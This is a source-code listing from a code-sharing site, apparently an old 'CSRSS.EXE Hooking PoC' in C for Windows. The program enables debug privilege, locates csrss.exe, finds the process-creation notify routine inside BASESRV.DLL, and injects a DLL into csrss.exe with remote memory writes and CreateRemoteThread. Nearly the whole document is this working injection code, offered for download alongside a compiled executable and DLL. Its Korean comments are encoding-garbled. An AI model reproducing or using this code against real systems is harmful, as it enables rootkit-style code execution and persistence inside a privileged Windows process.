Home » Source Code » » CsrssHook.c - this upload sample...................
Click here to see more ▼
Click here to hide ▲

CsrssHook.c - this upload sample...................


			
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <tlhelp32.h>
#include <Psapi.h>
#pragma comment(lib, "Psapi.lib")

LPVOID Addr = NULL;
DWORD CsrssPID = 0;

VOID CheckDLL(VOID);
LPVOID CsrGetCsrssProcessNotifyRoutine(VOID);
VOID GetDebugPrivilege(VOID);
DWORD GetCsrssProcessId(VOID);
VOID MakeDirectoryPathFromPath(LPSTR Path);

typedef struct _SYSTEM_PROCESS_INFORMATION {

    ULONG NextEntryOffset;
    ULONG NumberOfThreads;
    BYTE Reserved1[48];
    PVOID Reserved2[3];
    HANDLE UniqueProcessId;
    PVOID Reserved3;
    ULONG HandleCount;
    BYTE Reserved4[4];
    PVOID Reserved5[11];
    SIZE_T PeakPagefileUsage;
    SIZE_T PrivatePageCount;
    LARGE_INTEGER Reserved6[6];

} SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;

typedef LONG (WINAPI *QUERYPROC)(LONG,PVOID,ULONG,PULONG);

#define STATUS_INFO_LENGTH_MISMATCH 0xC0000004L
#define SystemProcessesAndThreadsInformation 5

int main(int argc, char **argv)
{

	HANDLE hProcess, hThread;
	char FileName[260] = {
0
};
	DWORD WrittenBytes = 0;
	LPVOID lpStr = NULL;
	DWORD TID = 0;

	printf("==============================================\n");
	printf("[+] CSRSS.EXE Hooking PoC Code\n");
	printf("[+] Made By 荐切里捞 (ljm92201@paran.com, startgoora)\n");
	printf("==============================================\n\n");

	Addr = CsrGetCsrssProcessNotifyRoutine();
	if(!Addr)
	{

		printf("[+] Error: Can't found address Notify Routine!? Is WinNT?\n");
		return 1;
	
}

	// 老窜 林家蔼阑 备秦柯促. (静柳 臼阑巴 [栖])
	printf("[+] Found Address! %08X\n", Addr);

	printf("[+] Enabling debug privilege...");
	GetDebugPrivilege();

	printf("[+] Getting CSRSS.EXE Process Id...");
	CsrssPID = GetCsrssProcessId();

	// DLL阑 夯拜利栏肺 林涝茄促.
	hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, CsrssPID);
	if(!hProcess)
	{

		printf("[+] OpenProcess() Failed! (GetLastError: %x)\n", GetLastError());
		return 1;
	
}

	// DLL String阑 持绰促.

	// 版肺甫 备茄促.
	GetModuleFileName(NULL, FileName, 260);
	// \甫 0栏肺 父电促.
	MakeDirectoryPathFromPath(FileName);
	strcat(FileName, "\\Notify.DLL");

	//printf("[+] DLL Path Name: %s\n", FileName);
	if(GetFileAttributes(FileName) == -1)
	{

		if(GetLastError() == ERROR_FILE_NOT_FOUND)
		{

			printf("[+] Notify.DLL is missing.\n");
			CloseHandle(hProcess);
			return 1;
		
}
	
}

	// DLL Check
	CheckDLL();

	// DLL Inject!
	lpStr = VirtualAllocEx(hProcess, NULL, strlen(FileName)+1, MEM_COMMIT, PAGE_READWRITE);
	if(!lpStr)
	{

		printf("[+] Remote Memory Allocation is failed.\n");
		CloseHandle(hProcess);
		return 1;
	
}
	
	WriteProcessMemory(hProcess, lpStr, FileName, strlen(FileName)+1, &WrittenBytes);
	if(WrittenBytes < strlen(FileName))
	{

		printf("[+] WriteProcessMemory failed.\n");
		CloseHandle(hProcess);
		return 1;
	
}

	hThread = CreateRemoteThread(hProcess, 
					   NULL, 
					   0, 
					   (LPTHREAD_START_ROUTINE) GetProcAddress(GetModuleHandle("KERNEL32.DLL"), "LoadLibraryA"), 
					   lpStr,
					   0,
					   &TID);
	if(hThread)
	{

		if(WaitForSingleObject(hThread, 3000) == WAIT_TIMEOUT)
		{

			printf("[+] DLL Injection Failed.\n");
			TerminateThread(hThread, 0);
			CloseHandle(hProcess);
			return 1;
		
}
	
} else {

		printf("[+] DLL Injection Failed.\n");
		CloseHandle(hProcess);
		return 1;
	
}

	printf("[+] DLL Injection Success.\n");
	CloseHandle(hProcess);
	return 0;

}

VOID CheckDLL(VOID)
{

	HANDLE hSnapShot = NULL;
	hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, CsrssPID);
	if(hSnapShot != INVALID_HANDLE_VALUE)
	{

		BOOL ret = FALSE;
		MODULEENTRY32 me;
		memset(&me, 0, sizeof(MODULEENTRY32));
		me.dwSize = sizeof(MODULEENTRY32);
		ret = Module32First(hSnapShot, &me);
		while(ret)
		{

			//printf("[+] Module Name: %s", me.szModule);
			if(strcmpi(me.szModule, "notify.dll") == 0){

				printf("[+] ERROR! Already Injected.");
				CloseHandle(hSnapShot);
				exit(1);
			
}
			ret = Module32Next(hSnapShot, &me);
		
}
		CloseHandle(hSnapShot);
	
}

}

VOID MakeDirectoryPathFromPath(LPSTR Path)
{

	int i;
	for(i = strlen(Path) - 1; i >= 0; i--)
	{

		if(Path[i] == '\\'){

			Path[i] = 0;
			return;
		
}
	
}

}

DWORD GetCsrssProcessId(VOID)
{

	HMODULE hNtDLL = NULL;
	HANDLE ProcessHandle = NULL;
	QUERYPROC QueryProc = NULL;
	LPVOID Buffer = NULL;
	PCHAR CurrentPtr = NULL;
	DWORD Needed = 0;
	LONG status = 0;
	SYSTEM_PROCESS_INFORMATION proc;
	CHAR ModuleName[255] = {
0
};

	Buffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(SYSTEM_PROCESS_INFORMATION));
	if(!Buffer)
	{

		printf(" Failed! Memory Allocation is failed.\n");
		exit(1); return 0;
	
}

	hNtDLL = GetModuleHandle("NTDLL.DLL");
	QueryProc = (QUERYPROC)GetProcAddress(hNtDLL, "ZwQuerySystemInformation");
	if(!QueryProc){

		printf(" Failed! ZwQuerySystemInformation is not supported.\n");
		exit(1); return 0;
	
}
	
	// Get Process List
	Needed = sizeof(SYSTEM_PROCESS_INFORMATION);
	status = QueryProc(SystemProcessesAndThreadsInformation, Buffer, sizeof(SYSTEM_PROCESS_INFORMATION), &Needed);
	if(status == STATUS_INFO_LENGTH_MISMATCH)
	{

		if(Needed != 0)
		{

			Buffer = HeapReAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, Buffer, Needed);
			if(!Buffer){

				printf(" Failed! Memory Reallocation is failed.\n");
				exit(1); return 0;
			
}

			status = QueryProc(SystemProcessesAndThreadsInformation, Buffer, Needed, &Needed);
		
} else {

			while(status == STATUS_INFO_LENGTH_MISMATCH)
			{

				DWORD Dummy;

				Needed += sizeof(SYSTEM_PROCESS_INFORMATION);
				Buffer = HeapReAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, Buffer, Needed);
				if(!Buffer){

					printf(" Failed! Memory Reallocation is failed.\n");
					exit(1); return 0;
				
}

				status = QueryProc(SystemProcessesAndThreadsInformation, Buffer, Needed, &Dummy);
			
}
		
}
	
}
	
	if(status)
	{

		printf(" Failed! ZwQuerySystemInformation failed in unknown reason (NTSTATUS %08X)\n", status);
		exit(1); return 0;
	
}

	CurrentPtr = Buffer;
	proc = *(PSYSTEM_PROCESS_INFORMATION) CurrentPtr;
	while(proc.NextEntryOffset)
	{

		// printf("[+] Traversing... %d\n", proc.UniqueProcessId);
		ProcessHandle = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, (DWORD) proc.UniqueProcessId);
		if(ProcessHandle)
		{

			RtlFillMemory(ModuleName, 255, 0);
			GetModuleBaseName(ProcessHandle, NULL, ModuleName, 255);
			if(strcmpi(ModuleName, "csrss.exe") == 0)
			{

				printf(" Success! (PID: %d)\n", proc.UniqueProcessId);
				return (DWORD) proc.UniqueProcessId;
			
}
			CloseHandle(ProcessHandle);
		
}
		CurrentPtr += proc.NextEntryOffset;
		proc = *(PSYSTEM_PROCESS_INFORMATION) CurrentPtr;
	
}

	HeapFree(GetProcessHeap(), 0, Buffer);
	printf(" Failed! CSRSS.exe is missing.\n");
	exit(1);
	return 0;

}

VOID GetDebugPrivilege(VOID)
{

	HMODULE hNtDLL = NULL;
	LPVOID PrivProc = NULL;
	DWORD Dummy = 0;
	hNtDLL = GetModuleHandle("NTDLL.DLL");
	if(!hNtDLL)
	{

		printf(" Failed! Is WinNT?\n");
		exit(1); return;
	
}

	PrivProc = (LPVOID) GetProcAddress(hNtDLL, "RtlAdjustPrivilege");
	if(!PrivProc)
	{

		printf(" Failed! RtlAdjustPrivilege is not supported.\n");
		exit(1); return;
	
}
	
	((VOID (WINAPI*)(DWORD,BOOL,BOOL,LPDWORD))PrivProc)(20, 1, 0, &Dummy);

	printf(" Success\n");

}

LPVOID CsrGetCsrssProcessNotifyRoutine(VOID)
{

	HMODULE hBaseSrv = NULL;
	PCHAR NotifyProc = NULL;
	int i = 0;
	hBaseSrv = GetModuleHandle("BASESRV.DLL");
	if(!hBaseSrv){

		hBaseSrv = LoadLibrary("BASESRV.DLL");
		if(!hBaseSrv) return NULL;
	
}
	NotifyProc = (PCHAR)GetProcAddress(hBaseSrv, "BaseSetProcessCreateNotify");
	if(!NotifyProc)	return NULL;

	for(;i < 64;)
	{

		if(NotifyProc[i] == (CHAR) 0xA3) // MOV DWORD PTR [XXXXXXXX], EAX
		{

			return *(LPVOID *)(NotifyProc + i + 1);
		
}
		i++;
	
}
	return NULL;

}
			
Expand> <Close
Sponsored links

File list

Tips: You can preview the content of files by clicking file names^_^
NameSizeDate
 CsrssHook.exe32.00 kB04-17-08 22:02
 Notify.dll40.00 kB01-18-08 10:03
 CsrssHook.c7.76 kB04-17-08 22:01
 CsrssHook.dsp3.35 kB01-18-08 00:02
 CsrssHook.dsw543.00 B01-18-08 00:02
 CsrssHook.ncb41.00 kB04-17-08 22:02
 CsrssHook.opt52.50 kB04-17-08 22:02
 CsrssHook.plg1.08 kB04-17-08 22:02
 Notify.c1.99 kB01-18-08 10:03
 NotifyDLL.dsp3.99 kB01-18-08 09:48
 NotifyDLL.dsw543.00 B01-18-08 09:33
 NotifyDLL.ncb33.00 kB01-18-08 10:04
 NotifyDLL.opt52.50 kB01-18-08 10:04
 NotifyDLL.plg1.17 kB01-18-08 10:03
...
Sponsored links
×

Login CodeForge

Don't have an account? Register now
Need any help?
Mail to: support@codeforge.com
×

Sorry, you don't have enough CF coins! ^_^|||

Fast channel (Get CF coins immediately):
1 CF coins (points) for $5.00 USD
5 CF coins (points) for $15.00 USD
10 CF coins (points) for $20.00 USD
22 CF coins (points) for$40.00USD
55 CF coins (points) for$100.00USD
120 CF coins (points) for$200.00USD
Free channel :

Submit your source codes
You could get 1-10 CF coins
More……
×

切换到中文版?

×

Where are you going?

×

Tips

This user hasn't enable blog!
×

Tips

Favorite by Ctrl+D